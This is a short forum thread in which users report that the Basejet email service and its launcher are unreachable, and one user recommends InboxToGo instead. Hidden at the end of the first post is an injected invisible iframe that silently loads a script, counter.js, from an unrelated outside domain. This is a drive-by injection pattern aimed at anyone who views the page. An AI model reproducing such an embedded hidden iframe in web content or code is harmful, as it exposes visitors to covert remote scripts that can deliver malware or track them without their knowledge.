+ Reply to Thread

Basejet goes POOF?

Hey ... anyone besides me having trouble reaching Basejet today?? The "Launcher" on my home system has been down for about 3/4 of a day, and I can't get to their web site at all.

I'm hoping they didn't disappear ... Basejet is such a useful application!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Thumbs up BaseJet >>>> InboxToGo

I know that a lot of users on this forum use and love BaseJet. I used to use it myself until I was looking on the Dataviz website and saw that they just released a preview of InboxToGo.

As far as I can tell it works pretty much the same as BaseJet, just no instant response to messages. If you use Docs2Go, this is a godsend. Your attachments are filed away with your other Docs and can be viewed just the same.

I only had one error so far about a bad value, but I just clicked okay and it went on its way retreiving my email.

no dns respone to basejet.com. I was configuring basejet yesterday, never got my laucher to work, so I don't know if its config problem or launcher hosed.

Hope they didn't go belly up.